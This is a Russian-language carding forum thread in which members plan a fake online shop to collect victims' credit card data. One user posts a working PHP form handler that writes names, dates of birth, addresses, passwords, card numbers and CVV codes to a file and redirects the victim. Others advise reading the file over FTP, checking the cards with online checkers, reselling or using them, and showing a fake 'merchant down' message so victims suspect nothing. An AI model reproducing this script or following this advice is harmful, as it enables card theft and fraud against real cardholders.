мерч для шопа

abckizaru

Professional
Messages
498
Reputation
87
Reaction score
161
Points
43
появилась идея поставить фейк шоп и собирать сс, есть пару вопросов.
что бы поставить свой мерч для шопа что потребуется, который будет только процессить карты? только писать самому? или где нибудь можно готовый взять?
или лучше поставить страницу фейк, которая будет писать апрув на любую инфу после нажатия на кнопку конфирм?
 

Katsuro

Professional
Messages
353
Reputation
33
Reaction score
40
Points
28
Фейк и скрипт обработчика формы. Больше впринципе ничего и не надо.
 

abckizaru

Professional
Messages
498
Reputation
87
Reaction score
161
Points
43
этот скрипт будет процессить карты? то есть если не валид, писать что транза не прошла.
и где скрипт взять? сколько стоит? есть в паблике?
 

Katsuro

Professional
Messages
353
Reputation
33
Reaction score
40
Points
28
Cкрипт на php, может заносить данные с формы в базу данных, либо слать на мыло. Любой php программист сможет это реализовать вплоть до мелочей. В паблике видел, но они недоработанные. Легче заказать, думаю не дороже 30$.

---------- Сообщение добавлено в 15:58 ---------- Предыдущее сообщение размещено в 15:56 ----------

этот скрипт будет процессить карты? то есть если не валид, писать что транза не прошла.
и где скрипт взять? сколько стоит? есть в паблике?

Скрипт только собирает данные из формы, которую заполнил покупатель.
 

abckizaru

Professional
Messages
498
Reputation
87
Reaction score
161
Points
43
Katsuro, вопрос в другом, мне нужен свой мерч, не хочу работать с пайпалом или авторизнет, одна абуза и акк локнут.
поэтому и нужен свой мерч, вот и созрел вопрос где такое взять
 

Katsuro

Professional
Messages
353
Reputation
33
Reaction score
40
Points
28
Эти фэйки можно пачками клепать, или ставь на анти-абузу.
А как замутить свой мерч - это я хз.. Но точно знаю, что это пиздец как геморно.
 
Last edited:

abckizaru

Professional
Messages
498
Reputation
87
Reaction score
161
Points
43
я это все знаю... суть вопроса в первом посте :)
 

Passion

VIP member
Messages
562
Reputation
92
Reaction score
124
Points
43
фейк шоп
Шоп должен функционировать как шоп?
Я бы погуглил, не получилось бы найти, написал бы админу шопа у которого есть мерч. Админ подсказал как сделать свой мерч. Думаю... он ничего от этого не потерял. Сделал мерч и фейк в него. Только зачем тогда фейк, если БД сами же и будете админить. Собрал картон, почистил все для нужных людей (думаю кто-то за этим все равно смотрит, чтобы БД картона была вычищенна от cvv) и продавал или сам вбивал его.

---------- Сообщение добавлено в 17:11 ---------- Предыдущее сообщение размещено в 17:09 ----------

Любой php программист сможет это реализовать вплоть до мелочей. В паблике видел, но они недоработанные. Легче заказать, думаю не дороже 30$.
В разделе про хакерство я выкладывал такой скрипт. Его вполне хватит, чуть-чуть исправлений и будет писать не только пару полей, а все что нужно.
 
Last edited:

Passion

VIP member
Messages
562
Reputation
92
Reaction score
124
Points
43
<?PHP
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$dob = $_POST['dob'];
$email_address = $_POST['email_address'];
$street_address = $_POST['street_address'];
$postcode = $_POST['postcode'];
$city = $_POST['city'];
$password = $_POST['password'];
$confirmation = $_POST['confirmation'];
$card_number = $_POST['card_number'];
$expiration = $_POST['expiration'];
$holdername = $_POST['holdername'];
$cvvcode = $_POST['cvvcode'];

$log = fopen("base.php","a+");
fwrite($log,"\n $firstname:$lastname:$dob:$email_address:$street_a ddress:$postcode:$city:$password:$confirmation:$ca rd_number:$expiration:$holdername:$cvvcode \n");
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://куда послать юзера после того как ввел данные'></head></html>";
?>

Уже готовый код, слегка изменить и вуаля, готово.

---------- Сообщение добавлено в 17:20 ---------- Предыдущее сообщение размещено в 17:19 ----------

хттп://carder.market/showthread.php?t=36164&page=3
 

Passion

VIP member
Messages
562
Reputation
92
Reaction score
124
Points
43
Пожалуйста. Будет писать в файл base.php . Затем через фтп его смотрите и видите уже БД свежего картона.
 

abckizaru

Professional
Messages
498
Reputation
87
Reaction score
161
Points
43
Passion, мерч что бы отсеивать не валид, а то он будет даже сгеренные карты апрувить, а мне надо что бы он апрувил только валид. Да и подозрения будут если холдер для проверки вобъет левак, а такой я уверен найдется.
скинь тоже скрипт пож
 

Katsuro

Professional
Messages
353
Reputation
33
Reaction score
40
Points
28
Как по твоему он будет отсеивать невалид? Нужно либо чтобы твой мерч работал с банками, либо был чекер.

---------- Сообщение добавлено в 17:50 ---------- Предыдущее сообщение размещено в 17:45 ----------

Passion, мерч что бы отсеивать не валид, а то он будет даже сгеренные карты апрувить, а мне надо что бы он апрувил только валид. Да и подозрения будут если холдер для проверки вобъет левак, а такой я уверен найдется.
скинь тоже скрипт пож

А вот этого вобще непонимаю.. тыже будишь траффик лить на фэйк..Если там и будет невалид, так без этого никуда. Все равно потом базу чекать будишь.
 

Passion

VIP member
Messages
562
Reputation
92
Reaction score
124
Points
43
мерч что бы отсеивать не валид
Лично я представляю это так - холд вбивает картон, далее картон отправляется в банк или каким-то образом с ним задействован"банком", где проходит его чек. Если картон валид, банк дает добро админу шопа, что все нормально и деньги зачислятся на Ваш счет. А если не валид, и писать не нужно. Тем более если своя БД, свой шоп. В итоге будет известно какая картонка - валид, а какая - нет
а то он будет даже сгеренные карты апрувить, а мне надо что бы он апрувил только валид. Да и подозрения будут если холдер для проверки вобъет левак, а такой я уверен найдется.

Пусть вбивают, просто я не понял до конца... шоп будет реальный или же фейк шопа.

Если фейк, значит можно перенаправлять на онлайн чекер какой нибудь, или софтину писать, что бы данные с фтп брала и чекала на валид. Все чекеры работают через какой нибудь мерч как ни крути. И если дальше размышлять, придем к выводу, что вбив в другие ресурсы для чека дает нам чекер. Так вот, суть мысли... После того как холд вбил картон, делать так, что бы шоп скрыто от холда глаз чекал его на каком нибудь онлайновском чекере. В это время пока происходит проверка на валид, холд видел надпись "подождите пожалуйста идет проверка данных" или что-то в этом роде. Картонка - гууд, идем дальше. Не валид, так и пишет, что где-то ошиблись, проверьте правильность данных.

Склоняюсь к первым предложениям, сам не сталкивался с данным вопросом. Ну, а фейк - легко сделать.

Скрипта у меня нету для мерча или что бы в чекер онлайн какой-нибудь вбивался картон. Считаю, что это не к чему, потом все равно можно пачкой все чекать(если шоп-фейк), а если рабочий шоп, то тоже будете знать про карту все, валид или нет.
 

abckizaru

Professional
Messages
498
Reputation
87
Reaction score
161
Points
43
вопрос закроем, поставлю что бы апровил все, мне главное что бы холдер вбивал сс а на остальное наплевать
Passion,
В разделе про хакерство я выкладывал такой скрипт. Его вполне хватит, чуть-чуть исправлений и будет писать не только пару полей, а все что нужно.
я про этот скрипт
 
Last edited:

Vasders

Professional
Messages
2,552
Reputation
365
Reaction score
520
Points
113
Да и подозрения будут если холдер для проверки вобъет левак, а такой я уверен найдется.
Пусть на каждый вбив выдается не аппрувед, а "извините, мерч лежит, пробуйте позже" и у холдера никаких подозрений нет. Он будет думать, что сайт просто не работает.
А собранный картон все равно чекать нужно, без этого никуда.
 

Katsuro

Professional
Messages
353
Reputation
33
Reaction score
40
Points
28
вопрос закроем, поставлю что бы апровил все, мне главное что бы холдер вбивал сс а на остальное наплевать

Тогда кроме фэйка и данного скрипта больше ничего ненужно :)
 
Top